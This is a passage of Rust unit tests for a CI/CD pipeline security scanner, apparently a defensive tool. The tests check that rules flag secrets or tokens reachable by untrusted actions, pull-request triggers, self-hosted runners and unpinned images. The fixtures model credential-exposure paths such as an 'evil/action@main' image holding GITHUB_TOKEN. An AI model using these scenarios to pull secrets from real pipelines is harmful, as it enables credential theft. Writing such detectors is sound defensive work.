6939            "pr-build",
6940            TrustZone::Untrusted,
6941            [(META_JOB_NAME.to_string(), "build".to_string())].into(),
6942        );
6943        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6944        let deploy = g.add_node_with_metadata(
6945            NodeKind::Step,
6946            "deploy",
6947            TrustZone::FirstParty,
6948            [
6949                (META_JOB_NAME.to_string(), "build".to_string()), // SAME job
6950            ]
6951            .into(),
6952        );
6953        g.add_edge(build, artifact, EdgeKind::Produces);
6954        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6955        let findings = artifact_boundary_crossing(&g);
6956        assert_eq!(
6957            findings.len(),
6958            0,
6959            "intra-job upload→download must not fire; got: {findings:#?}"
6960        );
6961    }
6962
6963    #[test]
6964    fn artifact_crossing_firstparty_producer_untrusted_consumer_silent() {
6965        // First-party producer -> untrusted consumer: should NOT fire (benign direction)
6966        let mut g = AuthorityGraph::new(source("ci.yml"));
6967        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
6968        let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
6969        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
6970        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
6971
6972        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6973        g.add_edge(build, artifact, EdgeKind::Produces);
6974        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6975
6976        let findings = artifact_boundary_crossing(&g);
6977        assert_eq!(
6978            findings.len(),
6979            0,
6980            "first-party -> untrusted should not fire"
6981        );
6982    }
6983
6984    #[test]
6985    fn propagation_to_sha_pinned_is_high_not_critical() {
6986        let mut g = AuthorityGraph::new(source("ci.yml"));
6987        let mut meta = std::collections::HashMap::new();
6988        meta.insert(
6989            "digest".into(),
6990            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6991        );
6992        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
6993        let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
6994        let image = g.add_node_with_metadata(
6995            NodeKind::Image,
6996            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6997            TrustZone::ThirdParty,
6998            meta,
6999        );
7000
7001        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7002        g.add_edge(step, image, EdgeKind::UsesImage);
7003
7004        let findings = authority_propagation(&g, 4);
7005        // Should find propagation to the SHA-pinned image
7006        let image_findings: Vec<_> = findings
7007            .iter()
7008            .filter(|f| f.nodes_involved.contains(&image))
7009            .collect();
7010        assert!(!image_findings.is_empty());
7011        // SHA-pinned targets get High, not Critical (non-OIDC source)
7012        assert_eq!(image_findings[0].severity, Severity::High);
7013    }
7014
7015    #[test]
7016    fn oidc_identity_to_pinned_third_party_is_critical() {
7017        let mut g = AuthorityGraph::new(source("ci.yml"));
7018
7019        // OIDC-federated cloud identity — token itself is the threat
7020        let mut id_meta = std::collections::HashMap::new();
7021        id_meta.insert(META_OIDC.into(), "true".into());
7022        let identity = g.add_node_with_metadata(
7023            NodeKind::Identity,
7024            "AWS_OIDC_ROLE",
7025            TrustZone::FirstParty,
7026            id_meta,
7027        );
7028
7029        // SHA-pinned ThirdParty image — would normally be High without OIDC
7030        let mut img_meta = std::collections::HashMap::new();
7031        img_meta.insert(
7032            META_DIGEST.into(),
7033            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
7034        );
7035        let image = g.add_node_with_metadata(
7036            NodeKind::Image,
7037            "aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
7038            TrustZone::ThirdParty,
7039            img_meta,
7040        );
7041
7042        // Step in ThirdParty zone holds the OIDC identity and uses the pinned image
7043        let step = g.add_node(
7044            NodeKind::Step,
7045            "configure-aws-credentials",
7046            TrustZone::ThirdParty,
7047        );
7048        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7049        g.add_edge(step, image, EdgeKind::UsesImage);
7050
7051        let findings = authority_propagation(&g, 4);
7052        let image_findings: Vec<_> = findings
7053            .iter()
7054            .filter(|f| f.nodes_involved.contains(&image))
7055            .collect();
7056        assert!(
7057            !image_findings.is_empty(),
7058            "expected OIDC→pinned propagation finding"
7059        );
7060        // OIDC source escalates pinned ThirdParty from High → Critical
7061        assert_eq!(image_findings[0].severity, Severity::Critical);
7062    }
7063
7064    #[test]
7065    fn propagation_to_untrusted_is_critical() {
7066        let mut g = AuthorityGraph::new(source("ci.yml"));
7067        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7068        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7069        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7070
7071        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7072        g.add_edge(step, image, EdgeKind::UsesImage);
7073
7074        let findings = authority_propagation(&g, 4);
7075        let image_findings: Vec<_> = findings
7076            .iter()
7077            .filter(|f| f.nodes_involved.contains(&image))
7078            .collect();
7079        assert!(!image_findings.is_empty());
7080        assert_eq!(image_findings[0].severity, Severity::Critical);
7081    }
7082
7083    #[test]
7084    fn long_lived_credential_detected() {
7085        let mut g = AuthorityGraph::new(source("ci.yml"));
7086        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
7087        g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
7088        g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
7089        // Non-matching names
7090        g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
7091
7092        let findings = long_lived_credential(&g);
7093        assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
7094        assert!(findings
7095            .iter()
7096            .all(|f| f.category == FindingCategory::LongLivedCredential));
7097    }
7098
7099    #[test]
7100    fn duplicate_unpinned_actions_deduplicated() {
7101        let mut g = AuthorityGraph::new(source("ci.yml"));
7102        // Same action used in two jobs — two Image nodes, same name
7103        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7104        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7105        g.add_node(
7106            NodeKind::Image,
7107            "actions/setup-node@v3",
7108            TrustZone::Untrusted,
7109        );
7110
7111        let findings = unpinned_action(&g);
7112        // Should get 2 findings (checkout + setup-node), not 3
7113        assert_eq!(findings.len(), 2);
7114    }
7115
7116    #[test]
7117    fn broad_identity_scope_flagged_as_high() {
7118        let mut g = AuthorityGraph::new(source("ci.yml"));
7119        let mut meta = std::collections::HashMap::new();
7120        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7121        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7122        let identity = g.add_node_with_metadata(
7123            NodeKind::Identity,
7124            "GITHUB_TOKEN",
7125            TrustZone::FirstParty,
7126            meta,
7127        );
7128        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7129        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7130
7131        let findings = over_privileged_identity(&g);
7132        assert_eq!(findings.len(), 1);
7133        assert_eq!(findings[0].severity, Severity::High);
7134        assert!(findings[0].message.contains("broad"));
7135    }
7136
7137    #[test]
7138    fn unknown_identity_scope_flagged_as_medium() {
7139        let mut g = AuthorityGraph::new(source("ci.yml"));
7140        let mut meta = std::collections::HashMap::new();
7141        meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
7142        meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
7143        let identity = g.add_node_with_metadata(
7144            NodeKind::Identity,
7145            "GITHUB_TOKEN",
7146            TrustZone::FirstParty,
7147            meta,
7148        );
7149        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7150        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7151
7152        let findings = over_privileged_identity(&g);
7153        assert_eq!(findings.len(), 1);
7154        assert_eq!(findings[0].severity, Severity::Medium);
7155        assert!(findings[0].message.contains("unknown"));
7156    }
7157
7158    #[test]
7159    fn floating_image_unpinned_container_flagged() {
7160        let mut g = AuthorityGraph::new(source("ci.yml"));
7161        let mut meta = std::collections::HashMap::new();
7162        meta.insert(META_CONTAINER.into(), "true".into());
7163        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7164
7165        let findings = floating_image(&g);
7166        assert_eq!(findings.len(), 1);
7167        assert_eq!(findings[0].category, FindingCategory::FloatingImage);
7168        assert_eq!(findings[0].severity, Severity::Medium);
7169    }
7170
7171    #[test]
7172    fn partial_graph_preserves_critical_findings() {
7173        let mut g = AuthorityGraph::new(source("ci.yml"));
7174        g.mark_partial("matrix strategy hides some authority paths");
7175
7176        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7177        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7178        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7179
7180        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7181        g.add_edge(step, image, EdgeKind::UsesImage);
7182
7183        let findings = run_all_rules(&g, 4);
7184        assert!(findings
7185            .iter()
7186            .any(|f| f.category == FindingCategory::AuthorityPropagation));
7187        assert!(findings
7188            .iter()
7189            .any(|f| f.category == FindingCategory::UntrustedWithAuthority));
7190        assert!(
7191            findings.iter().any(|f| f.severity == Severity::Critical),
7192            "partial graph completeness must not down-rank critical findings"
7193        );
7194    }
7195
7196    #[test]
7197    fn unknown_graph_preserves_critical_findings() {
7198        let mut g = AuthorityGraph::new(source("ci.yml"));
7199        g.completeness = crate::graph::AuthorityCompleteness::Unknown;
7200
7201        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7202        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7203        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7204
7205        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7206        g.add_edge(step, image, EdgeKind::UsesImage);
7207
7208        let findings = run_all_rules(&g, 4);
7209        assert!(
7210            findings.iter().any(|f| f.severity == Severity::Critical),
7211            "unknown graph completeness must not down-rank critical findings"
7212        );
7213    }
7214
7215    #[test]
7216    fn complete_graph_keeps_critical_findings() {
7217        let mut g = AuthorityGraph::new(source("ci.yml"));
7218
7219        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7220        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7221        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7222
7223        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7224        g.add_edge(step, image, EdgeKind::UsesImage);
7225
7226        let findings = run_all_rules(&g, 4);
7227        assert!(findings.iter().any(|f| f.severity == Severity::Critical));
7228    }
7229
7230    #[test]
7231    fn floating_image_digest_pinned_container_not_flagged() {
7232        let mut g = AuthorityGraph::new(source("ci.yml"));
7233        let mut meta = std::collections::HashMap::new();
7234        meta.insert(META_CONTAINER.into(), "true".into());
7235        g.add_node_with_metadata(
7236            NodeKind::Image,
7237            "ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
7238            TrustZone::ThirdParty,
7239            meta,
7240        );
7241
7242        let findings = floating_image(&g);
7243        assert!(
7244            findings.is_empty(),
7245            "digest-pinned container should not be flagged"
7246        );
7247    }
7248
7249    #[test]
7250    fn unpinned_action_does_not_flag_container_images() {
7251        // Regression: container Image nodes are handled by floating_image, not unpinned_action.
7252        // The same node must not generate findings from both rules.
7253        let mut g = AuthorityGraph::new(source("ci.yml"));
7254        let mut meta = std::collections::HashMap::new();
7255        meta.insert(META_CONTAINER.into(), "true".into());
7256        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7257
7258        let findings = unpinned_action(&g);
7259        assert!(
7260            findings.is_empty(),
7261            "unpinned_action must skip container images to avoid double-flagging"
7262        );
7263    }
7264
7265    #[test]
7266    fn floating_image_ignores_action_images() {
7267        let mut g = AuthorityGraph::new(source("ci.yml"));
7268        // Image node without META_CONTAINER — this is a step uses: action, not a container
7269        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7270
7271        let findings = floating_image(&g);
7272        assert!(
7273            findings.is_empty(),
7274            "floating_image should not flag step actions"
7275        );
7276    }
7277
7278    #[test]
7279    fn persisted_credential_rule_fires_on_persists_to_edge() {
7280        let mut g = AuthorityGraph::new(source("ci.yml"));
7281        let token = g.add_node(
7282            NodeKind::Identity,
7283            "System.AccessToken",
7284            TrustZone::FirstParty,
7285        );
7286        let checkout = g.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
7287        g.add_edge(checkout, token, EdgeKind::PersistsTo);
7288
7289        let findings = persisted_credential(&g);
7290        assert_eq!(findings.len(), 1);
7291        assert_eq!(findings[0].category, FindingCategory::PersistedCredential);
7292        assert_eq!(findings[0].severity, Severity::High);
7293        assert!(findings[0].message.contains("persistCredentials"));
7294    }
7295
7296    #[test]
7297    fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
7298        let mut g = AuthorityGraph::new(source("ci.yml"));
7299        let step = g.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
7300        let mut meta = std::collections::HashMap::new();
7301        meta.insert(META_CLI_FLAG_EXPOSED.into(), "true".into());
7302        let secret =
7303            g.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, meta);
7304        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7305
7306        let findings = untrusted_with_authority(&g);
7307        assert_eq!(findings.len(), 1);
7308        assert!(
7309            findings[0].message.contains("-var flag"),
7310            "message should note -var flag log exposure"
7311        );
7312        assert!(matches!(
7313            findings[0].recommendation,
7314            Recommendation::Manual { .. }
7315        ));
7316    }
7317
7318    #[test]
7319    fn constrained_identity_scope_not_flagged() {
7320        let mut g = AuthorityGraph::new(source("ci.yml"));
7321        let mut meta = std::collections::HashMap::new();
7322        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
7323        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
7324        let identity = g.add_node_with_metadata(
7325            NodeKind::Identity,
7326            "GITHUB_TOKEN",
7327            TrustZone::FirstParty,
7328            meta,
7329        );
7330        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7331        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7332
7333        let findings = over_privileged_identity(&g);
7334        assert!(
7335            findings.is_empty(),
7336            "constrained scope should not be flagged"
7337        );
7338    }
7339
7340    #[test]
7341    fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
7342        let mut g = AuthorityGraph::new(source("ci.yml"));
7343        g.metadata
7344            .insert(META_TRIGGER.into(), "pull_request_target".into());
7345        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7346        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7347        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7348
7349        let findings = trigger_context_mismatch(&g);
7350        assert_eq!(findings.len(), 1);
7351        assert_eq!(findings[0].severity, Severity::Critical);
7352        assert_eq!(
7353            findings[0].category,
7354            FindingCategory::TriggerContextMismatch
7355        );
7356    }
7357
7358    #[test]
7359    fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
7360        let mut g = AuthorityGraph::new(source("ci.yml"));
7361        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7362        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7363        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7364
7365        let findings = trigger_context_mismatch(&g);
7366        assert!(findings.is_empty(), "no trigger metadata → no finding");
7367    }
7368
7369    #[test]
7370    fn cross_workflow_authority_chain_detected() {
7371        let mut g = AuthorityGraph::new(source("ci.yml"));
7372        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7373        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7374        let external = g.add_node(
7375            NodeKind::Image,
7376            "evil/workflow.yml@main",
7377            TrustZone::Untrusted,
7378        );
7379        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7380        g.add_edge(step, external, EdgeKind::DelegatesTo);
7381
7382        let findings = cross_workflow_authority_chain(&g);
7383        assert_eq!(findings.len(), 1);
7384        assert_eq!(findings[0].severity, Severity::Critical);
7385        assert_eq!(
7386            findings[0].category,
7387            FindingCategory::CrossWorkflowAuthorityChain
7388        );
7389    }
7390
7391    #[test]
7392    fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
7393        let mut g = AuthorityGraph::new(source("ci.yml"));
7394        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7395        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7396        let local = g.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
7397        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7398        g.add_edge(step, local, EdgeKind::DelegatesTo);
7399
7400        let findings = cross_workflow_authority_chain(&g);
7401        assert!(
7402            findings.is_empty(),
7403            "FirstParty delegation should not be flagged"
7404        );
7405    }
7406
7407    #[test]
7408    fn authority_cycle_detected() {
7409        let mut g = AuthorityGraph::new(source("ci.yml"));
7410        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7411        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7412        g.add_edge(a, b, EdgeKind::DelegatesTo);
7413        g.add_edge(b, a, EdgeKind::DelegatesTo);
7414
7415        let findings = authority_cycle(&g);
7416        assert_eq!(findings.len(), 1);
7417        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7418        assert_eq!(findings[0].severity, Severity::High);
7419    }
7420
7421    #[test]
7422    fn authority_cycle_no_fire_for_acyclic_graph() {
7423        let mut g = AuthorityGraph::new(source("ci.yml"));
7424        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7425        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7426        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7427        g.add_edge(a, b, EdgeKind::DelegatesTo);
7428        g.add_edge(b, c, EdgeKind::DelegatesTo);
7429
7430        let findings = authority_cycle(&g);
7431        assert!(findings.is_empty(), "acyclic graph must not fire");
7432    }
7433
7434    #[test]
7435    fn uplift_without_attestation_fires_when_oidc_no_attests() {
7436        let mut g = AuthorityGraph::new(source("ci.yml"));
7437        let mut meta = std::collections::HashMap::new();
7438        meta.insert(META_OIDC.into(), "true".into());
7439        let identity = g.add_node_with_metadata(
7440            NodeKind::Identity,
7441            "AWS/deploy-role",
7442            TrustZone::FirstParty,
7443            meta,
7444        );
7445        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7446        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7447
7448        let findings = uplift_without_attestation(&g);
7449        assert_eq!(findings.len(), 1);
7450        assert_eq!(findings[0].severity, Severity::Info);
7451        assert_eq!(
7452            findings[0].category,
7453            FindingCategory::UpliftWithoutAttestation
7454        );
7455    }
7456
7457    #[test]
7458    fn uplift_without_attestation_no_fire_when_attests_present() {
7459        let mut g = AuthorityGraph::new(source("ci.yml"));
7460        let mut id_meta = std::collections::HashMap::new();
7461        id_meta.insert(META_OIDC.into(), "true".into());
7462        let identity = g.add_node_with_metadata(
7463            NodeKind::Identity,
7464            "AWS/deploy-role",
7465            TrustZone::FirstParty,
7466            id_meta,
7467        );
7468        let mut step_meta = std::collections::HashMap::new();
7469        step_meta.insert(META_ATTESTS.into(), "true".into());
7470        let attest_step =
7471            g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
7472        let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7473        g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
7474        // Touch attest_step so the variable is used (avoid unused warning)
7475        let _ = attest_step;
7476
7477        let findings = uplift_without_attestation(&g);
7478        assert!(findings.is_empty(), "attestation present → no finding");
7479    }
7480
7481    #[test]
7482    fn uplift_without_attestation_no_fire_without_oidc() {
7483        let mut g = AuthorityGraph::new(source("ci.yml"));
7484        let mut meta = std::collections::HashMap::new();
7485        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7486        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7487        // Note: no META_OIDC
7488        let identity = g.add_node_with_metadata(
7489            NodeKind::Identity,
7490            "GITHUB_TOKEN",
7491            TrustZone::FirstParty,
7492            meta,
7493        );
7494        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7495        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7496
7497        let findings = uplift_without_attestation(&g);
7498        assert!(
7499            findings.is_empty(),
7500            "broad identity without OIDC must not fire"
7501        );
7502    }
7503
7504    #[test]
7505    fn self_mutating_pipeline_untrusted_is_critical() {
7506        let mut g = AuthorityGraph::new(source("ci.yml"));
7507        let mut meta = std::collections::HashMap::new();
7508        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7509        g.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, meta);
7510
7511        let findings = self_mutating_pipeline(&g);
7512        assert_eq!(findings.len(), 1);
7513        assert_eq!(findings[0].severity, Severity::Critical);
7514        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7515    }
7516
7517    #[test]
7518    fn self_mutating_pipeline_privileged_step_is_high() {
7519        let mut g = AuthorityGraph::new(source("ci.yml"));
7520        let mut meta = std::collections::HashMap::new();
7521        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7522        let step = g.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, meta);
7523        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7524        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7525
7526        let findings = self_mutating_pipeline(&g);
7527        assert_eq!(findings.len(), 1);
7528        assert_eq!(findings[0].severity, Severity::High);
7529    }
7530
7531    #[test]
7532    fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
7533        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7534        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7535        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7536        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7537        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7538
7539        let findings = trigger_context_mismatch(&g);
7540        assert_eq!(findings.len(), 1);
7541        assert_eq!(findings[0].severity, Severity::High);
7542        assert_eq!(
7543            findings[0].category,
7544            FindingCategory::TriggerContextMismatch
7545        );
7546    }
7547
7548    #[test]
7549    fn cross_workflow_authority_chain_third_party_is_high() {
7550        let mut g = AuthorityGraph::new(source("ci.yml"));
7551        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7552        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7553        // ThirdParty target (SHA-pinned external workflow)
7554        let external = g.add_node(
7555            NodeKind::Image,
7556            "org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
7557            TrustZone::ThirdParty,
7558        );
7559        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7560        g.add_edge(step, external, EdgeKind::DelegatesTo);
7561
7562        let findings = cross_workflow_authority_chain(&g);
7563        assert_eq!(findings.len(), 1);
7564        assert_eq!(
7565            findings[0].severity,
7566            Severity::High,
7567            "ThirdParty delegation target should be High (Critical reserved for Untrusted)"
7568        );
7569        assert_eq!(
7570            findings[0].category,
7571            FindingCategory::CrossWorkflowAuthorityChain
7572        );
7573    }
7574
7575    #[test]
7576    fn self_mutating_pipeline_first_party_no_authority_is_medium() {
7577        let mut g = AuthorityGraph::new(source("ci.yml"));
7578        let mut meta = std::collections::HashMap::new();
7579        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7580        // FirstParty step writes the gate but holds no secret/identity access.
7581        g.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, meta);
7582
7583        let findings = self_mutating_pipeline(&g);
7584        assert_eq!(findings.len(), 1);
7585        assert_eq!(findings[0].severity, Severity::Medium);
7586        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7587    }
7588
7589    #[test]
7590    fn authority_cycle_3node_cycle_includes_all_members() {
7591        // A → B → C → A should produce one finding whose nodes_involved
7592        // contains all three node IDs, not just the back-edge endpoints.
7593        let mut g = AuthorityGraph::new(source("test.yml"));
7594        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7595        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7596        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7597        g.add_edge(a, b, EdgeKind::DelegatesTo);
7598        g.add_edge(b, c, EdgeKind::DelegatesTo);
7599        g.add_edge(c, a, EdgeKind::DelegatesTo);
7600
7601        let findings = authority_cycle(&g);
7602        assert_eq!(findings.len(), 1);
7603        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7604        assert!(
7605            findings[0].nodes_involved.contains(&a),
7606            "A must be in nodes_involved"
7607        );
7608        assert!(
7609            findings[0].nodes_involved.contains(&b),
7610            "B must be in nodes_involved — middle of A→B→C→A cycle"
7611        );
7612        assert!(
7613            findings[0].nodes_involved.contains(&c),
7614            "C must be in nodes_involved"
7615        );
7616    }
7617
7618    #[test]
7619    fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
7620        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7621        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7622        let mut secret_meta = std::collections::HashMap::new();
7623        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7624        let secret = g.add_node_with_metadata(
7625            NodeKind::Secret,
7626            "prod-deploy-secrets",
7627            TrustZone::FirstParty,
7628            secret_meta,
7629        );
7630        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7631        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7632
7633        let findings = variable_group_in_pr_job(&g);
7634        assert_eq!(findings.len(), 1);
7635        assert_eq!(findings[0].severity, Severity::Critical);
7636        assert_eq!(findings[0].category, FindingCategory::VariableGroupInPrJob);
7637        assert!(findings[0].message.contains("prod-deploy-secrets"));
7638    }
7639
7640    #[test]
7641    fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
7642        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7643        // No trigger metadata — should not fire
7644        let mut secret_meta = std::collections::HashMap::new();
7645        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7646        let secret = g.add_node_with_metadata(
7647            NodeKind::Secret,
7648            "prod-deploy-secrets",
7649            TrustZone::FirstParty,
7650            secret_meta,
7651        );
7652        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7653        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7654
7655        let findings = variable_group_in_pr_job(&g);
7656        assert!(
7657            findings.is_empty(),
7658            "no PR trigger → variable_group_in_pr_job must not fire"
7659        );
7660    }
7661
7662    #[test]
7663    fn variable_group_in_pr_job_no_fire_when_pr_none() {
7664        // Regression for Bug 1: pr: none in ADO means no PR trigger — the parser
7665        // must not set META_TRIGGER, so variable_group_in_pr_job must not fire.
7666        // This test validates at the rule level: no META_TRIGGER → no firing.
7667        let mut g = AuthorityGraph::new(source("weekly-report.yml"));
7668        // No META_TRIGGER inserted — mirrors what the parser produces for pr: none.
7669        let mut secret_meta = std::collections::HashMap::new();
7670        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7671        let secret = g.add_node_with_metadata(
7672            NodeKind::Secret,
7673            "ado-report-secrets",
7674            TrustZone::FirstParty,
7675            secret_meta,
7676        );
7677        let step = g.add_node(NodeKind::Step, "report-step", TrustZone::FirstParty);
7678        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7679
7680        let findings = variable_group_in_pr_job(&g);
7681        assert!(
7682            findings.is_empty(),
7683            "pr: none (no META_TRIGGER) → variable_group_in_pr_job must not fire; got: {findings:#?}"
7684        );
7685    }
7686
7687    #[test]
7688    fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
7689        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7690        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7691
7692        let mut pool_meta = std::collections::HashMap::new();
7693        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7694        g.add_node_with_metadata(
7695            NodeKind::Image,
7696            "self-hosted-pool",
7697            TrustZone::FirstParty,
7698            pool_meta,
7699        );
7700
7701        let mut step_meta = std::collections::HashMap::new();
7702        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7703        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7704
7705        let findings = self_hosted_pool_pr_hijack(&g);
7706        assert_eq!(findings.len(), 1);
7707        assert_eq!(findings[0].severity, Severity::Critical);
7708        assert_eq!(
7709            findings[0].category,
7710            FindingCategory::SelfHostedPoolPrHijack
7711        );
7712        assert!(findings[0].message.contains("self-hosted"));
7713    }
7714
7715    #[test]
7716    fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
7717        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7718        // No trigger metadata
7719
